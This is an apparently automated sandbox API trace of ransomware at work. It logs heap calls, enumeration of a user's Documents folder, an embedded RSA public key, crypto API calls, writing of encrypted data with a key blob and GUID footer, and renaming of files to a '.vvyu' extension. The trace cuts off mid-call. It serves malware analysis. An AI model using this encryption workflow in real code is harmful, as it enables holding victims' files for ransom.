[0196.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0196.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66c8 | out: hHeap=0x2c0000) returned 1 [0196.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66b0 | out: hHeap=0x2c0000) returned 1 [0196.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6710 | out: hHeap=0x2c0000) returned 1 [0196.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0196.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0196.837] GetCurrentThreadId () returned 0x5d8 [0196.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0196.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2300 [0196.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0196.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.838] GetCurrentThreadId () returned 0x5d8 [0196.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0196.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6710 [0196.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66b0 [0196.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0196.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66c8 [0196.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6698 [0196.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6728 [0196.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0196.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66f8 [0196.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66e0 [0196.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6740 [0196.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66e0 | out: hHeap=0x2c0000) returned 1 [0196.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66e0 [0196.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66f8 | out: hHeap=0x2c0000) returned 1 [0196.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0196.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0196.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66b0 | out: hHeap=0x2c0000) returned 1 [0196.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66b0 [0196.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6710 | out: hHeap=0x2c0000) returned 1 [0196.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6740 | out: hHeap=0x2c0000) returned 1 [0196.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66b0 | out: hHeap=0x2c0000) returned 1 [0196.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66e0 | out: hHeap=0x2c0000) returned 1 [0196.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6728 | out: hHeap=0x2c0000) returned 1 [0196.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66c8 | out: hHeap=0x2c0000) returned 1 [0196.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6698 | out: hHeap=0x2c0000) returned 1 [0196.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0196.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6680 | out: hHeap=0x2c0000) returned 1 [0196.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea4e8 | out: hHeap=0x2c0000) returned 1 [0196.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0196.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.851] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x5536, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x5536, lpOverlapped=0x0) returned 1 [0196.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.852] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x553b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.852] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0196.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0196.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0196.853] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.854] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.854] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.854] CloseHandle (hObject=0x584) returned 1 [0196.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0196.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0196.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0196.858] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\hfGoG8BRVBw\\0sE02.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\hfgog8brvbw\\0se02.odp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\hfGoG8BRVBw\\0sE02.odp.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\hfgog8brvbw\\0se02.odp.vvyu")) returned 1 [0196.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.860] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0196.863] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67be6010, ftCreationTime.dwHighDateTime=0x1d8a733, ftLastAccessTime.dwLowDateTime=0x6f6951d0, ftLastAccessTime.dwHighDateTime=0x1d8a738, ftLastWriteTime.dwLowDateTime=0x6f6951d0, ftLastWriteTime.dwHighDateTime=0x1d8a738, nFileSizeHigh=0x0, nFileSizeLow=0x11773, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DJyNf5d3ZVp0RV8Gb.docx", cAlternateFileName="DJYNF5~1.DOC")) returned 1 [0196.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0196.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.863] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\hfGoG8BRVBw\\DJyNf5d3ZVp0RV8Gb.docx") returned=".docx" [0196.863] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\hfGoG8BRVBw\\DJyNf5d3ZVp0RV8Gb.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\hfgog8brvbw\\djynf5d3zvp0rv8gb.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.864] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=71539) returned 1 [0196.864] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.867] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1174d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.867] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.869] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.869] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x11773, lpOverlapped=0x0) returned 1 [0196.870] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.870] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.870] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.870] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b640) returned 1 [0196.871] CryptCreateHash (in: hProv=0x31b640, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0196.871] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.871] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.871] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.871] GetLastError () returned 0x0 [0196.871] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0196.871] CryptReleaseContext (hProv=0x31b640, dwFlags=0x0) returned 1 [0196.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.872] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.872] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.872] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11770) returned 0x2af5168 [0196.873] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea4e8 [0196.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 